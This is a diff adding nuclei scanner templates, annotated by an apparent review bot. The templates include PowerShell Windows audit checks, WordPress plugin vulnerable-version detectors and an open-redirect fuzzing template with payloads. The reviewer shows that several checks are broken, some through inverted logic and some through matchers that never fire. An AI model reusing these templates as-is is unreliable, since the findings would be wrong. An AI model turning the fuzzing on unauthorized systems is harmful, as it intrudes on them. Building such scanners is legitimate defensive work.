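Review bot: The PowerShell source queries `system.ftpServer/security/authentication/basicAuthentication` and the matcher looks for the word `Deny`, neither of which says anything about whether unencrypted FTP sessions are accepted, which is what the name, description and remediation claim; `basicAuthentication` exposes `enabled`/`defaultLogonDomain`/`logonMethod`, so `Deny` is unlikely to ever appear in its output. As far as I recall the IIS schema, the TLS requirement lives in `system.ftpServer/security/ssl` (`controlChannelPolicy` and `dataChannelPolicy`, where `SslRequire` forces encryption and `SslAllow` permits plaintext), so the probe should be along the lines of `Get-WebConfiguration -Filter system.ftpServer/security/ssl -PSPath IIS:\ -ErrorAction SilentlyContinue | Select-Object controlChannelPolicy,dataChannelPolicy` with the matcher flagging `SslAllow`. On hosts without the IIS FTP role the command errors silently and the template is quiet, which is the right direction, but a comment stating that would help.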
@@ -0,0 +1,32 @@ +id: ftp-service-running + +info: + name: FTP Service Running + author: princechaddha + severity: high + description: Checks if the FTP service is running. + impact: | + FTP transmits data in plaintext, which can lead to unauthorized access and interception of credentials. + remediation: | + Disable the FTP service and use secure alternatives like SFTP. + tags: windows,ftp,service,insecure,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-Service -Name ftpsvc | Select-Object -ExpandProperty Status + + matchers: + - type: word + words: + - "Running" diff --git a/poc/fuzz/fuzz-headless.yaml b/poc/fuzz/fuzz-headless.yaml new file mode 100644 index 0000000000..39d4bce694 --- /dev/null +++ b/poc/fuzz/fuzz-headless.yaml @@ -0,0 +1,31 @@ +id: headless-query-fuzzing + +info: + name: Example Query Fuzzing + author: pdteam + severity: info + +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + - action: waitload + + payloads: + redirect: + - "blog.com" + - "portal.com" + + fuzzing: + - part: query + mode: single + type: replace + fuzz: + - "https://{{redirect}}" + + matchers: + - type: word + part: body + words: + - "{{redirect}}" diff --git a/poc/header/headless-header-status-test.yaml b/poc/header/headless-header-status-test.yaml new file mode 100644 index 0000000000..1b53d22522 --- /dev/null +++ b/poc/header/headless-header-status-test.yaml @@ -0,0 +1,24 @@ +id: headless-header-status-test + +info: + name: headless header + status test + author: pdteam + severity: info + +headless: + - steps: + - args: + url: "{{BaseURL}}" + action: navigate + - action: waitload + + matchers-condition: and + matchers: + - type: word + part: header + words: + - text/plain + + - type: status + status: + - 200 
diff --git a/poc/http/http-get.yaml b/poc/http/http-get.yaml new file mode 100644 index 0000000000..93181f74bd --- /dev/null +++ b/poc/http/http-get.yaml @@ -0,0 +1,15 @@ +id: basic-get-with-cert + +info: + name: Basic GET with Cert + author: pdteam + severity: info + +http: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - "Hello" \ No newline at end of file diff --git a/poc/http/http-matcher-extractor-dy-extractor.yaml b/poc/http/http-matcher-extractor-dy-extractor.yaml new file mode 100644 index 0000000000..eb26d50bf7 --- /dev/null +++ b/poc/http/http-matcher-extractor-dy-extractor.yaml @@ -0,0 +1,36 @@ +id: http-matcher-extractor-dy-extractor +info: + name: HTTP matcher and extractor & dynamic extractor + description: > + Edgecase to test for a combination of matchers , extractors and dynamic extractors + author: pdteam + severity: info + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + - | + GET {{absolutePath}} HTTP/1.1 + + req-condition: true + extractors: + - type: regex + internal: true + part: body_1 + name: absolutePath + regex: + - '' + group: 1 + - type: regex + internal: false + part: body_2 + name: title + regex: + - ']*>([^<]+)' + group: 1 + matchers: + - type: regex + part: body_2 + regex: + - ']*>([^<]+)' \ No newline at end of file diff --git a/poc/http/http-preprocessor.yaml b/poc/http/http-preprocessor.yaml new file mode 100644 index 0000000000..795e86150b --- /dev/null +++ b/poc/http/http-preprocessor.yaml @@ -0,0 +1,17 @@ +id: http-preprocessor + +info: + name: Test Http Preprocessor + author: pdteam + severity: info + +http: + - raw: + - | + GET /?test={{randstr}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/http/multi-http-var-sharing.yaml b/poc/http/multi-http-var-sharing.yaml new file mode 100644 index 0000000000..606a036504 --- /dev/null +++ b/poc/http/multi-http-var-sharing.yaml 
@@ -0,0 +1,36 @@ +id: multi-http-var-sharing + +info: + name: Multi HTTP var sharing + author: pdteam + severity: info + description: | + A template which has multiple HTTP requests block and variables are shared between them + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - "This is test matcher text" + negative: true + internal: true + + extractors: + - type: dsl + name: ffff + dsl: + - status_code + internal: true + + - method: GET + path: + - "{{BaseURL}}/{{ffff}}" + + matchers: + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/http/net-https-timeout.yaml b/poc/http/net-https-timeout.yaml new file mode 100644 index 0000000000..a0d106fc0b --- /dev/null +++ b/poc/http/net-https-timeout.yaml @@ -0,0 +1,25 @@ +id: net-https-timeout + +info: + name: Example Network template which times out + author: pdteam + severity: high + description: Example Network template to send HTTPS request which times out + + +tcp: + - host: + - "tls://{{Hostname}}" + port: 443 + inputs: + # noticable difference between this and net-https.yaml is that here we don't send the Connection: close header + # and hence connection will remain open until server closes it. This can be a DOS vector in nuclei + # as it waits for server to close the connection. now we have set a default timeout of 5 seconds and if server responds but doesn't close the connection + # then nuclei will close connection but doesn't fail the request since we already have response data from server + # this feature is only required for `read-all: true` to work properly + - data: "GET / HTTP/1.1\r\nHost: {{Hostname}}\r\n\r\n" + read-all: true + extractors: + - type: dsl + dsl: + - "len(data)" \ No newline at end of file diff --git a/poc/http/net-https.yaml b/poc/http/net-https.yaml new file mode 100644 index 0000000000..94914560f2 --- /dev/null +++ b/poc/http/net-https.yaml 
@@ -0,0 +1,20 @@
+id: net-https
+
+info:
+ name: Example Network template to send HTTPS request
+ author: pdteam
+ severity: high
+ description: Example Network template to send HTTPS request
+
+
+tcp:
+ - host:
+ - "tls://{{Hostname}}"
+ port: 443
+ inputs:
+ - data: "GET / HTTP/1.1\r\nHost: {{Hostname}}\r\nConnection: close\r\n\r\n"
+ read-all: true
+ extractors:
+ - type: dsl
+ dsl:
+ - "len(data)"
\ No newline at end of file
diff --git a/poc/javascript/nodejs-framework-exceptions.yaml b/poc/javascript/nodejs-framework-exceptions.yaml
new file mode 100644
index 0000000000..09ab0b67bb
--- /dev/null
+++ b/poc/javascript/nodejs-framework-exceptions.yaml
@@ -0,0 +1,32 @@
+id: nodejs-framework-exceptions
+
+info:
+ name: Node.js Framework Exceptions
+ author: Aayush Dhakal
+ severity: medium
+ description: Detects suspicious Node.js framework exceptions that could indicate exploitation attempts
+ reference:
+ - https://expressjs.com/en/guide/error-handling.html
+ - https://nodejs.org/en/docs/guides
+ tags: file, logs, nodejs
+
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ name: exception
+ part: body
+ regex:
+ - 'TypeError'
+ - 'ReferenceError'
+ - 'SyntaxError'
+ - 'ValidationError'
+ - 'UnauthorizedError'
+ - 'ForbiddenError'
+ - 'NotFoundError'
+ - 'InternalServerError'
+ - 'BadRequestError'
+ - 'MongoError'
+ - 'SequelizeDatabaseError'
diff --git a/poc/microsoft/sms-alert-e7666c2e9949971a8cf15a29d904cf8b.yaml b/poc/microsoft/sms-alert-e7666c2e9949971a8cf15a29d904cf8b.yaml
new file mode 100644
index 0000000000..841ccb9fe0
--- /dev/null
+++ b/poc/microsoft/sms-alert-e7666c2e9949971a8cf15a29d904cf8b.yaml
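Review bot: The `nodejs-framework-exceptions` template has only an extractor and no matcher, so every occurrence of a bare class name such as `TypeError`, `SyntaxError` or `NotFoundError` is emitted as a `severity: medium` finding; these names appear in ordinary application logs (a 404 handler throwing `NotFoundError`, a JSON parse failure), so the description's "could indicate exploitation attempts" is not supported by the patterns, and the regexes should at least be anchored to a stack-trace or error-log shape or paired with a matcher. `extensions: - all` means the scan is not restricted to log files either. `tags: file, logs, nodejs` has spaces after the commas where the other templates in this commit use `file,logs,nodejs`; nuclei trims them as far as I know, but the linter is stricter. The identical file is added again as `poc/nodejs/nodejs-framework-exceptions.yaml` further down.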
@@ -0,0 +1,59 @@ +id: sms-alert-e7666c2e9949971a8cf15a29d904cf8b + +info: + name: > + SMSAlert - WooCommerce <= 3.7.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via sa_subscribe Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c923d1d6-04c6-4ea2-a69e-041fea1e280a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/sms-alert/" + google-query: inurl:"/wp-content/plugins/sms-alert/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,sms-alert,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sms-alert/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sms-alert" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.5') \ No newline at end of file diff --git a/poc/nodejs/nodejs-framework-exceptions.yaml b/poc/nodejs/nodejs-framework-exceptions.yaml new file mode 100644 index 0000000000..09ab0b67bb --- /dev/null +++ b/poc/nodejs/nodejs-framework-exceptions.yaml 
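Review bot: `description: >` is empty and `cvss-metrics:`, `cvss-score:` and `cve-id:` are all null, so a positive hit explains nothing and carries no score even though `tags` includes `cve` and the name claims a stored XSS; the same empty blocks appear in `affiliate-toolkit-starter-…` and `arconix-shortcodes-…` below, and `shodan-query: 'vuln:'` is a placeholder in all three. Either the Wordfence entry's summary and CVE id should be filled in or the empty keys dropped so the output does not print null classification fields. Two extractors both use `name: version` (one `internal: true`); that is intentional so `compare_versions(version, '<= 3.7.5')` can run while the version still appears in output, but a one-line comment such as `# internal copy feeds compare_versions; the second exposes the version in results` would spare the next reader the question.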
@@ -0,0 +1,32 @@ +id: nodejs-framework-exceptions + +info: + name: Node.js Framework Exceptions + author: Aayush Dhakal + severity: medium + description: Detects suspicious Node.js framework exceptions that could indicate exploitation attempts + reference: + - https://expressjs.com/en/guide/error-handling.html + - https://nodejs.org/en/docs/guides + tags: file, logs, nodejs + +file: + - extensions: + - all + + extractors: + - type: regex + name: exception + part: body + regex: + - 'TypeError' + - 'ReferenceError' + - 'SyntaxError' + - 'ValidationError' + - 'UnauthorizedError' + - 'ForbiddenError' + - 'NotFoundError' + - 'InternalServerError' + - 'BadRequestError' + - 'MongoError' + - 'SequelizeDatabaseError' diff --git a/poc/other/a.yaml b/poc/other/a.yaml new file mode 100644 index 0000000000..0e51245817 --- /dev/null +++ b/poc/other/a.yaml @@ -0,0 +1,17 @@ +id: dns-a-query-example + +info: + name: Test DNS A Query Template + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" + type: A + class: inet + recursion: true + retries: 3 + matchers: + - type: word + words: + - "1.1.1.1" diff --git a/poc/other/aaaa.yaml b/poc/other/aaaa.yaml new file mode 100644 index 0000000000..58a2e496ce --- /dev/null +++ b/poc/other/aaaa.yaml @@ -0,0 +1,17 @@ +id: dns-aaaa-query-example + +info: + name: Test DNS AAAA Query Template + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" + type: AAAA + class: inet + recursion: true + retries: 3 + matchers: + - type: word + words: + - "2606:4700:4700::1001" diff --git a/poc/other/affiliate-toolkit-starter-dd5a0e0390a10aa5d721daf54dd2417d.yaml b/poc/other/affiliate-toolkit-starter-dd5a0e0390a10aa5d721daf54dd2417d.yaml new file mode 100644 index 0000000000..245a99ac24 --- /dev/null +++ b/poc/other/affiliate-toolkit-starter-dd5a0e0390a10aa5d721daf54dd2417d.yaml 
@@ -0,0 +1,59 @@ +id: affiliate-toolkit-starter-dd5a0e0390a10aa5d721daf54dd2417d + +info: + name: > + affiliate-toolkit <= 3.6.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via atkp_product Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7f86568f-dcdd-44fb-905a-9c5474f56515?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/affiliate-toolkit-starter/" + google-query: inurl:"/wp-content/plugins/affiliate-toolkit-starter/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,affiliate-toolkit-starter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/affiliate-toolkit-starter/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "affiliate-toolkit-starter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.6.5') \ No newline at end of file diff --git a/poc/other/allow-untrusted-certificates.yaml b/poc/other/allow-untrusted-certificates.yaml new file mode 100644 index 0000000000..77877ba498 --- /dev/null +++ b/poc/other/allow-untrusted-certificates.yaml 
@@ -0,0 +1,29 @@ +id: allow-untrusted-certificates + +info: + name: System Allows Untrusted Certificates + author: princechaddha + severity: medium + description: Checks if the system allows untrusted certificates to be installed. + impact: | + Installing untrusted certificates can lead to man-in-the-middle attacks and data theft. + remediation: | + Ensure that untrusted certificates are blocked and only allow trusted certificates to be installed. + tags: certificates,untrusted,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + pattern: "*.ps1" + source: | + $certs = Get-ChildItem -Path Cert:\CurrentUser\Disallowed; if ($certs.Count -gt 0) { "Misconfigured certificates detected:`n" + ($certs.Subject -join "`n") } else { "No untrusted certificates detected." } + + matchers: + - type: word + words: + - "Misconfigured certificates detected" diff --git a/poc/other/anonymous-sam-enumeration-enabled.yaml b/poc/other/anonymous-sam-enumeration-enabled.yaml new file mode 100644 index 0000000000..18cff69cde --- /dev/null +++ b/poc/other/anonymous-sam-enumeration-enabled.yaml 
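Review bot: `Cert:\CurrentUser\Disallowed` is the Untrusted Certificates store, which Windows populates by design with certificates it explicitly distrusts; a non-empty store is the normal, healthy state, so `$certs.Count -gt 0` reports essentially every host as `Misconfigured certificates detected` and treats the one state that is actually weak (an empty Disallowed store) as clean. The logic is inverted relative to the template's own name and description, which ask a policy question (can untrusted certificates be installed) that the contents of the Disallowed store cannot answer, so the probe needs to be redesigned rather than tweaked; until then the matcher produces a false positive fleet-wide. Unlike its siblings this template also omits `-ExecutionPolicy Bypass` in `args`, which may stop the script running at all on hosts with a restricted policy.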
@@ -0,0 +1,32 @@ +id: anonymous-sam-enumeration-enabled + +info: + name: Anonymous Enumeration of SAM Accounts Enabled + author: princechaddha + severity: high + description: Checks if anonymous users can enumerate Security Account Manager (SAM) accounts, posing a security risk. + impact: | + Anonymous enumeration of SAM accounts exposes user information that could be leveraged in further attacks. + remediation: | + Disable anonymous enumeration of SAM accounts to prevent unauthorized information gathering. + tags: windows,sam,enumeration,anonymous,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'RestrictAnonymousSAM' + + matchers: + - type: word + words: + - "restrictanonymoussam : 0" diff --git a/poc/other/anonymous-sid-enumeration-enabled.yaml b/poc/other/anonymous-sid-enumeration-enabled.yaml new file mode 100644 index 0000000000..fc36422541 --- /dev/null +++ b/poc/other/anonymous-sid-enumeration-enabled.yaml 
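Review bot: `Get-ItemProperty` prints the value name with its registry casing (`RestrictAnonymousSAM : 0`), while nuclei's word matcher compares case-sensitively unless `case-insensitive: true` is set, so `restrictanonymoussam : 0` should never match as written unless the code protocol lower-cases its output somewhere I cannot see; the same applies to `everyoneincludesanonymous : 1` in `anonymous-sid-enumeration-enabled.yaml` just below. Either add `case-insensitive: true` under the matcher or use `RestrictAnonymousSAM : 0` in `words`. When the value is absent the cmdlet raises an error instead of printing anything, and since a missing `RestrictAnonymousSAM` means the restrictive default applies, that silence is the safe direction, but a comment saying so would stop someone adding `-ErrorAction SilentlyContinue` and a fallback match.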
@@ -0,0 +1,32 @@
+id: anonymous-sid-enumeration-enabled
+
+info:
+ name: Anonymous SID Enumeration Enabled
+ author: princechaddha
+ severity: medium
+ description: Checks if anonymous users can enumerate Security Identifiers (SIDs).
+ impact: |
+ Allowing anonymous SID enumeration can expose user account details and increase the risk of unauthorized access.
+ remediation: |
+ Restrict anonymous access to SID enumeration to enhance security.
+ tags: windows,code,windows-audit
+
+self-contained: true
+
+code:
+ - pre-condition: |
+ IsWindows();
+ engine:
+ - powershell
+ - powershell.exe
+ args:
+ - -ExecutionPolicy
+ - Bypass
+ pattern: "*.ps1"
+ source: |
+ Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'EveryoneIncludesAnonymous'
+
+ matchers:
+ - type: word
+ words:
+ - "everyoneincludesanonymous : 1"
diff --git a/poc/other/arconix-shortcodes-967c5b2184718a3fda197f1a2ade7c59.yaml b/poc/other/arconix-shortcodes-967c5b2184718a3fda197f1a2ade7c59.yaml
new file mode 100644
index 0000000000..95caa9d3a7
--- /dev/null
+++ b/poc/other/arconix-shortcodes-967c5b2184718a3fda197f1a2ade7c59.yaml
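Review bot: The value read, `EveryoneIncludesAnonymous`, is the "Let Everyone permissions apply to anonymous users" setting; it is not the control that governs anonymous SID/name enumeration, so `name`, `description` and `impact` describe a different control than the one tested. Either rename the template to what it measures or read the enumeration control it is named for (`RestrictAnonymous` under the same `Lsa` key is the closest registry-backed setting; confirm against the policy reference before switching). Independently, the lower-case `"everyoneincludesanonymous : 1"` will not match `Get-ItemProperty`'s `EveryoneIncludesAnonymous : 1` output unless `case-insensitive: true` is added to the matcher.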
@@ -0,0 +1,59 @@ +id: arconix-shortcodes-967c5b2184718a3fda197f1a2ade7c59 + +info: + name: > + Arconix Shortcodes <= 2.1.13 - Authenticated (Contributor+) Stored Cross-Site Scripting via box Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/94bae97d-2959-4ace-992d-1f4b1ccc8c3b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/arconix-shortcodes/" + google-query: inurl:"/wp-content/plugins/arconix-shortcodes/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,arconix-shortcodes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/arconix-shortcodes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "arconix-shortcodes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.13') \ No newline at end of file diff --git a/poc/other/aspnet-framework-exceptions.yaml b/poc/other/aspnet-framework-exceptions.yaml new file mode 100644 index 0000000000..cfd5e35f55 --- /dev/null +++ b/poc/other/aspnet-framework-exceptions.yaml 
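Review bot: `description: >` is empty and every `classification:` field (`cvss-metrics`, `cvss-score`, `cve-id`) is blank, so a hit carries no context beyond the title; at minimum copy the one-line summary from the Wordfence reference into `description`. The detection compares the `Stable tag` in `readme.txt` with `<= 2.1.13`, which reflects the package published to wordpress.org rather than the installed code (readmes lag, and a readme saying `trunk` is not captured by `[0-9.]+`, leaving `version` unset for the `compare_versions` DSL — confirm how that DSL treats an empty value). The `shodan-query: 'vuln:'` placeholder identifies nothing and should be dropped rather than shipped.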
@@ -0,0 +1,24 @@ +id: aspnet-framework-exceptions + +info: + name: ASP.NET Framework Exceptions + author: Aayush Dhakal + severity: medium + description: Detects suspicious ASP.NET framework exceptions that could indicate exploitation attempts + reference: + - https://docs.microsoft.com/en-us/dotnet/api/system.web.httpexception + tags: file, logs, aspnet + +file: + - extensions: + - all + + extractors: + - type: regex + name: exception + part: body + regex: + - 'HttpException' + - 'InvalidOperationException' + - 'UnauthorizedAccessException' + - 'NotFound' diff --git a/poc/other/audit-logging-disabled.yaml b/poc/other/audit-logging-disabled.yaml new file mode 100644 index 0000000000..702b4cd190 --- /dev/null +++ b/poc/other/audit-logging-disabled.yaml @@ -0,0 +1,37 @@ +id: audit-logging-disabled + +info: + name: Audit Logging Disabled + author: princechaddha + severity: high + description: Check if audit logging for critical events is disabled. + impact: | + Disabling audit logging can lead to a lack of traceability for security incidents and breaches. + remediation: | + Enable audit logging for all critical security events to maintain a proper audit trail. + tags: windows,audit-logging,security,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + AuditPol /get /category:"Account Logon" + AuditPol /get /category:"Account Management" + + matchers: + - type: word + words: + - "User Account Management No Auditing" + - "Computer Account Management No Auditing" + - "Security Group Management No Auditing" + - "Credential Validation No Auditing" + - "Kerberos Authentication Service No Auditing" diff --git a/poc/other/audit-logs-not-archived.yaml b/poc/other/audit-logs-not-archived.yaml new file mode 100644 index 0000000000..4526d12fa1 --- /dev/null +++ b/poc/other/audit-logs-not-archived.yaml 
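Review bot: The extractor pattern `NotFound` (and to a lesser degree `InvalidOperationException`) matches in almost any log or source file, and with `extensions: - all` and no `matchers:` every file containing any of the four words is reported, so this template will mostly produce noise rather than the "exploitation attempts" the description promises. Anchor on the fully qualified type names, e.g. `System\.Web\.HttpException` and `System\.UnauthorizedAccessException`, drop `NotFound`, and narrow `extensions` to log formats such as `log` and `txt`. `tags: file, logs, aspnet` also carries spaces after the commas, unlike every other template in this commit; keep the format consistent so tag filtering works.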
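Review bot: `auditpol /get` pads each subcategory name with spaces to a fixed column before the setting, so single-space literals such as `"Credential Validation No Auditing"` never match that output and the check silently passes on an unaudited host. Normalise whitespace before matching, `(AuditPol /get /category:"Account Logon","Account Management") -replace '\s{2,}',' '`, or switch to a `regex` matcher like `Credential Validation\s+No Auditing`. `auditpol` also requires an elevated session; an unprivileged run prints an access-denied error that likewise matches nothing, so a DSL check that distinguishes "could not read policy" from "compliant" would avoid a false clean result.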
@@ -0,0 +1,29 @@ +id: audit-logs-not-archived + +info: + name: Audit Logs Not Archived When Full + author: princechaddha + severity: high + description: Checks if audit logs are not archived when full, leading to potential data loss. + impact: | + Failure to archive full logs could result in the loss of crucial audit data, hindering forensic analysis and incident response. + remediation: | + Enable log archiving to preserve important security event data. + tags: windows,audit,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + pattern: "*.ps1" + source: | + wevtutil get-log security + + matchers: + - type: word + words: + - "retention: false" diff --git a/poc/other/auto-logon-enabled.yaml b/poc/other/auto-logon-enabled.yaml new file mode 100644 index 0000000000..0c8ee01ebb --- /dev/null +++ b/poc/other/auto-logon-enabled.yaml @@ -0,0 +1,32 @@ +id: auto-logon-enabled + +info: + name: AutoLogon Enabled + author: princechaddha + severity: medium + description: Checks if automatic logon is enabled, allowing users to bypass login prompts. + impact: | + AutoLogon can allow unauthorized users to access the system without authentication. + remediation: | + Disable AutoLogon to ensure users are prompted for credentials. + tags: autologon,login,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name 'AutoAdminLogon' -ErrorAction SilentlyContinue).AutoAdminLogon -eq '1' + + matchers: + - type: word + words: + - "True" diff --git a/poc/other/automatic-windows-updates-disabled.yaml b/poc/other/automatic-windows-updates-disabled.yaml new file mode 100644 index 0000000000..70473d11d5 --- /dev/null +++ b/poc/other/automatic-windows-updates-disabled.yaml 
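Review bot: `retention: false` in `wevtutil get-log security` output means "overwrite events as needed" (the default circular log); the "archive the log when full" mode the name and remediation describe is reported as `autoBackup: true` alongside `retention: true`, so matching only `"retention: false"` flags the default overwrite configuration but never a `retention: true`/`autoBackup: false` log, which is the one that stops recording when full (confirm against the wevtutil reference). Match `"autoBackup: false"` instead, or report both values. This template also lacks the `args: -ExecutionPolicy Bypass` its siblings carry, so on a host with a Restricted execution policy the generated `.ps1` does not run and nothing is reported.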
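Review bot: When `AutoAdminLogon` is `1`, Winlogon commonly holds the account password in clear text in `DefaultPassword` under the same `Winlogon` key, which is the higher-value finding this check stops short of; report whether that value is present (never its contents), e.g. `$w = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -ErrorAction SilentlyContinue; if ($w.AutoAdminLogon -eq '1') { "AutoAdminLogon=1 DefaultUserName=$($w.DefaultUserName) DefaultPassword=$(if ($w.DefaultPassword) {'present'} else {'absent'})" }`. The `"True"` word matcher works for the current one-expression script but will fire on any other `True` a future edit prints; `- type: dsl` with `trim(response) == 'True'` is stricter.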
@@ -0,0 +1,32 @@
+id: automatic-windows-updates-disabled
+
+info:
+ name: Automatic Windows Updates Disabled
+ author: princechaddha
+ severity: medium
+ description: Checks if automatic Windows Updates are disabled.
+ impact: |
+ Without regular updates, systems may miss important security patches.
+ remediation: |
+ Enable automatic Windows Updates to ensure timely updates for system security.
+ tags: windows,updates,disabled,windows-audit
+
+self-contained: true
+
+code:
+ - pre-condition: |
+ IsWindows();
+ engine:
+ - powershell
+ - powershell.exe
+ args:
+ - -ExecutionPolicy
+ - Bypass
+ pattern: "*.ps1"
+ source: |
+ Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" -Name NoAutoUpdate | Select-Object -ExpandProperty NoAutoUpdate
+
+ matchers:
+ - type: word
+ words:
+ - "1"
\ No newline at end of file
diff --git a/poc/other/autoplay-removable-media-enabled.yaml b/poc/other/autoplay-removable-media-enabled.yaml
new file mode 100644
index 0000000000..b669788443
--- /dev/null
+++ b/poc/other/autoplay-removable-media-enabled.yaml
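Review bot: The matcher `"1"` is applied to the whole command output, and when `NoAutoUpdate` or the `WindowsUpdate\AU` key is absent (the default on an unmanaged host) `Get-ItemProperty` writes an error whose text typically contains `char:1`/line numbers, so if stderr is folded into `response` the template reports "updates disabled" on hosts where the policy simply is not set. Add `-ErrorAction SilentlyContinue` and match the exact value, `- type: dsl` with `trim(response) == '1'`. Absence of `NoAutoUpdate` does not by itself mean updates are enabled either; a positive answer needs `AUOptions` and the `wuauserv` service state, so the description should say the check only detects the explicit disable policy.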
@@ -0,0 +1,32 @@
+id: autoplay-removable-media-enabled
+
+info:
+ name: AutoPlay Enabled for Removable Media
+ author: princechaddha
+ severity: medium
+ description: Checks if AutoPlay is enabled for removable media, which can automatically execute malicious software.
+ impact: |
+ Enabling AutoPlay may allow the automatic execution of malware from external devices, increasing the attack surface.
+ remediation: |
+ Disable AutoPlay for all removable media to mitigate potential security threats.
+ tags: windows,autoplay,removable-media,code,windows-audit
+
+self-contained: true
+
+code:
+ - pre-condition: |
+ IsWindows();
+ engine:
+ - powershell
+ - powershell.exe
+ args:
+ - -ExecutionPolicy
+ - Bypass
+ pattern: "*.ps1"
+ source: |
+ Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers' -Name 'DisableAutoplay'
+
+ matchers:
+ - type: word
+ words:
+ - "DisableAutoplay : 0"
diff --git a/poc/other/autorun-scripts-startup-folder.yaml b/poc/other/autorun-scripts-startup-folder.yaml
new file mode 100644
index 0000000000..695ac5c82e
--- /dev/null
+++ b/poc/other/autorun-scripts-startup-folder.yaml
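Review bot: When `DisableAutoplay` has never been written, `Get-ItemProperty -Name 'DisableAutoplay'` throws instead of returning `0`, so the default state (AutoPlay enabled) produces an error and no match; the check only flags machines where someone explicitly set the value to 0. Read it defensively and treat absence as enabled: `$v = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers' -Name 'DisableAutoplay' -ErrorAction SilentlyContinue).DisableAutoplay; if (-not $v) { 'DisableAutoplay : 0' }`. The value is also per-user (`HKCU:` of whatever account nuclei runs as); the machine-wide policy lives under `HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer` (`NoDriveTypeAutoRun`, `NoAutoplayfornonVolume`) and is what a fleet audit normally wants.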
@@ -0,0 +1,33 @@
+id: autorun-scripts-startup-folder
+
+info:
+ name: Autorun Scripts in Startup Folder
+ author: princechaddha
+ severity: medium
+ description: Detect unauthorized scripts or executables in startup folders.
+ impact: |
+ Unauthorized scripts or executables can lead to the execution of malicious software during system startup.
+ remediation: |
+ Remove any unauthorized scripts or executables from the startup folder and implement security policies to restrict future unauthorized additions.
+ tags: windows,startup,autorun,code,windows-audit
+
+self-contained: true
+
+code:
+ - pre-condition: |
+ IsWindows();
+ engine:
+ - powershell
+ - powershell.exe
+ args:
+ - -ExecutionPolicy
+ - Bypass
+ pattern: "*.ps1"
+ source: |
+ Get-ChildItem -Path "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
+
